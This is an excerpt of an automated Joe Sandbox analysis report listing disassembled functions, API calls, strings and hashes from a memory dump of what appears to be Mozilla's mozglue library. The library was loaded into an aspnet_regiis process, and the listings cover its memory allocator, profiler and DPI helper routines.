                                                                                                                            • Instruction Fuzzy Hash: 7152E7B1A00225DFEB21DF65DD88BAE77B8FB46704F005199E40DA7640EB70AE85CF91
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CC364DF
                                                                                                                            • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CC364F2
                                                                                                                            • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CC36505
                                                                                                                            • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CC36518
                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC3652B
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC3671C
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC36724
                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC3672F
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC36759
                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC36764
                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CC36A80
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC36ABE
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC36AD3
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC36AE8
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC36AF7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                            • API String ID: 487479824-2878602165
                                                                                                                            • Opcode ID: a88dcf9fd52aa0d283eecdb0902543ce8139db41cc1a85667682f002a4ddfe2e
                                                                                                                            • Instruction ID: b059355ef27e424e2e24255db2b84c097e77144a9ef613de09c265de26f6bd28
                                                                                                                            • Opcode Fuzzy Hash: a88dcf9fd52aa0d283eecdb0902543ce8139db41cc1a85667682f002a4ddfe2e
                                                                                                                            • Instruction Fuzzy Hash: 05F1E070905A298FCB20CF65EC8CB9AB7B4BF06308F145299D80DA7641F731AE84CF90
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpystrlen
                                                                                                                            • String ID: (pre-xul)$data$name$schema
                                                                                                                            • API String ID: 3412268980-999448898
                                                                                                                            • Opcode ID: 588259089b6d6a87795ae3a57eeeacf8ddef342d679498dcc92377cab5ba0481
                                                                                                                            • Instruction ID: 24cd54955d16e65e8e2e3ec8070e8906602af9f7fc9a05b417d143f4ddb0f0ae
                                                                                                                            • Opcode Fuzzy Hash: 588259089b6d6a87795ae3a57eeeacf8ddef342d679498dcc92377cab5ba0481
                                                                                                                            • Instruction Fuzzy Hash: 9DE190B1A043518FC710CF69984065BFBE9BFC5354F14892DE899E7790EB70DD0A8B92
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D4F2
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D50B
                                                                                                                              • Part of subcall function 6CC2CFE0: EnterCriticalSection.KERNEL32(6CCAE784), ref: 6CC2CFF6
                                                                                                                              • Part of subcall function 6CC2CFE0: LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC2D026
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D52E
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE7DC), ref: 6CC4D690
                                                                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC4D6A6
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE7DC), ref: 6CC4D712
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D751
                                                                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC4D7EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                            • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                            • API String ID: 2690322072-3894294050
                                                                                                                            • Opcode ID: 23430af9d9d7ff312a8e61747a9e503943d0d0f89797de427916d83e9692939a
                                                                                                                            • Instruction ID: b7654e2f58b5a69547aa0ed0d0f5bb903d38d355f55cfc9592612fbf3d292644
                                                                                                                            • Opcode Fuzzy Hash: 23430af9d9d7ff312a8e61747a9e503943d0d0f89797de427916d83e9692939a
                                                                                                                            • Instruction Fuzzy Hash: 8F91AE71A047018FD718DF69C4A466AB7F1FB89314F14C92EE59AC7A85EB30E845CB82
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 6CC84EFF
                                                                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC84F2E
                                                                                                                            • moz_xmalloc.MOZGLUE ref: 6CC84F52
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000), ref: 6CC84F62
                                                                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC852B2
                                                                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC852E6
                                                                                                                            • Sleep.KERNEL32(00000010), ref: 6CC85481
                                                                                                                            • free.MOZGLUE(?), ref: 6CC85498
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                            • String ID: (
                                                                                                                            • API String ID: 4104871533-3887548279
                                                                                                                            • Opcode ID: 2ef6f12cddd6e34a64fa20ae7951338ced75201896359d558ead8571611365d0
                                                                                                                            • Instruction ID: 7b0ef78d63b19396aae7f37ccf28b9b0cfe0a9b9032b7ffaaace76b7f9539b84
                                                                                                                            • Opcode Fuzzy Hash: 2ef6f12cddd6e34a64fa20ae7951338ced75201896359d558ead8571611365d0
                                                                                                                            • Instruction Fuzzy Hash: BEF1D271A19B408FD716CF39C85062BB7F9AFD6384F05872EF846A7651EB31D8428B81
                                                                                                                            APIs
                                                                                                                            • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC72C31
                                                                                                                            • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC72C61
                                                                                                                              • Part of subcall function 6CC24DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC24E5A
                                                                                                                              • Part of subcall function 6CC24DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC24E97
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC72C82
                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC72E2D
                                                                                                                              • Part of subcall function 6CC381B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC381DE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                            • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                            • API String ID: 801438305-4149320968
                                                                                                                            • Opcode ID: 6b2649f076498071d19441ede49e89f70ead33051397f34f7897c507bc7f2568
                                                                                                                            • Instruction ID: b1b21774c3bbb1daed42c8107f0dec2ae747d217b092f16ee58b41ff83c06391
                                                                                                                            • Opcode Fuzzy Hash: 6b2649f076498071d19441ede49e89f70ead33051397f34f7897c507bc7f2568
                                                                                                                            • Instruction Fuzzy Hash: 7891DF70608740CFD724CF24C4A469EB7E1EF89358F14891DE59A9B751FB30D949CB62
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldiv__aullrem
                                                                                                                            • String ID: -Infinity$NaN
                                                                                                                            • API String ID: 3839614884-2141177498
                                                                                                                            • Opcode ID: 050005526a6d1434728557aa1d3a1057152f9312db1c515610de8afa34af46b7
                                                                                                                            • Instruction ID: f947ab0b572f63d716d02e8b49470fe60b4a72db4c941a68bd454c40277cf066
                                                                                                                            • Opcode Fuzzy Hash: 050005526a6d1434728557aa1d3a1057152f9312db1c515610de8afa34af46b7
                                                                                                                            • Instruction Fuzzy Hash: D6C19F31E01319DBDB14CFA9C8507DFBBB6BB84318F544529D406ABB80EB74A94ACB91
                                                                                                                            APIs
                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CC98A4B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2221118986-0
                                                                                                                            • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                            • Instruction ID: 58251682c4787300889b8591ac77c28550e0713a54c1b3f14a43aadc0fecfe22
                                                                                                                            • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                            • Instruction Fuzzy Hash: 9CB1D772E0121A8FDB14CF68CC91BE9B7B2FF95314F1802A9C549EB791E7309985CB91
                                                                                                                            APIs
                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CC988F0
                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CC9925C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2221118986-0
                                                                                                                            • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                            • Instruction ID: 616aa4bfac8b939ed3fe395b8cccb2a3620c388baaf0861dff5ae3a4a8f667aa
                                                                                                                            • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                            • Instruction Fuzzy Hash: 2BB1B572A0510A8FDB14CF58C891AEDB7B2EF85314F1402A9C549DBB85E730A999CB90
                                                                                                                            APIs
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC77A81
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC77A93
                                                                                                                              • Part of subcall function 6CC45C50: GetTickCount64.KERNEL32 ref: 6CC45D40
                                                                                                                              • Part of subcall function 6CC45C50: EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC45D67
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC77AA1
                                                                                                                              • Part of subcall function 6CC45C50: __aulldiv.LIBCMT ref: 6CC45DB4
                                                                                                                              • Part of subcall function 6CC45C50: LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC45DED
                                                                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6CC77B31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4054851604-0
                                                                                                                            • Opcode ID: 3c4416e008f77ac604d2a5e1adad6e0889f40deb70b28a1d1ce171531fc71874
                                                                                                                            • Instruction ID: 534c518ea44c8fb77b86e36b997f662daf2422814a6bcc403cef2f49fc3ed8f7
                                                                                                                            • Opcode Fuzzy Hash: 3c4416e008f77ac604d2a5e1adad6e0889f40deb70b28a1d1ce171531fc71874
                                                                                                                            • Instruction Fuzzy Hash: 3EB1AE316083848BDB25CF25C45065FB7E2FFC9318F154A1CE99567B90EB70E90ADB92
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(user32,?,6CC5E1A5), ref: 6CC85606
                                                                                                                            • LoadLibraryW.KERNEL32(gdi32,?,6CC5E1A5), ref: 6CC8560F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CC85633
                                                                                                                            • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CC8563D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CC8566C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CC8567D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CC85696
                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CC856B2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CC856CB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CC856E4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CC856FD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CC85716
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CC8572F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CC85748
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CC85761
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CC8577A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CC85793
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CC857A8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CC857BD
                                                                                                                            • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CC857D5
                                                                                                                            • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CC857EA
                                                                                                                            • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CC857FF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                            • API String ID: 2238633743-1964193996
                                                                                                                            • Opcode ID: 70c12590b2863d0942af9f566f0105e5e1be4bdaf5dbf8f6640e7fa63d710d77
                                                                                                                            • Instruction ID: 098dbec5e2eaa29b48ed3a87632936197ee697da86e35bfb2b21e87b237df66b
                                                                                                                            • Opcode Fuzzy Hash: 70c12590b2863d0942af9f566f0105e5e1be4bdaf5dbf8f6640e7fa63d710d77
                                                                                                                            • Instruction Fuzzy Hash: E65121716427079FEB019FF9AD6C96F3EF8AB063497504426A912E3A51FBB4CC018F60
                                                                                                                            APIs
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CC3582D), ref: 6CC6CC27
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CC3582D), ref: 6CC6CC3D
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CC9FE98,?,?,?,?,?,6CC3582D), ref: 6CC6CC56
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CC3582D), ref: 6CC6CC6C
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CC3582D), ref: 6CC6CC82
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CC3582D), ref: 6CC6CC98
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC3582D), ref: 6CC6CCAE
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CC6CCC4
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CC6CCDA
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CC6CCEC
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CC6CCFE
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CC6CD14
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CC6CD82
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CC6CD98
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CC6CDAE
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CC6CDC4
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CC6CDDA
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CC6CDF0
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CC6CE06
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CC6CE1C
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CC6CE32
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CC6CE48
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CC6CE5E
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CC6CE74
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CC6CE8A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strcmp
                                                                                                                            • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                            • API String ID: 1004003707-2809817890
                                                                                                                            • Opcode ID: a211903002b23262c5d0606c97b7b300429eda976d8e4590b6fd52652decdacd
                                                                                                                            • Instruction ID: 76f001b0b9b8a150dcaa0bdebdc0067fd765d3845f72643ad48051adb2ac40d2
                                                                                                                            • Opcode Fuzzy Hash: a211903002b23262c5d0606c97b7b300429eda976d8e4590b6fd52652decdacd
                                                                                                                            • Instruction Fuzzy Hash: 9751DEE1A4922553FE003117AF90BEA1445FF5334AF50457AEF2AA1F80FF09D60A86B7
                                                                                                                            APIs
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CC34801
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC34817
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC3482D
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3484A
                                                                                                                              • Part of subcall function 6CC5AB3F: EnterCriticalSection.KERNEL32(6CCAE370,?,?,6CC23527,6CCAF6CC,?,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB49
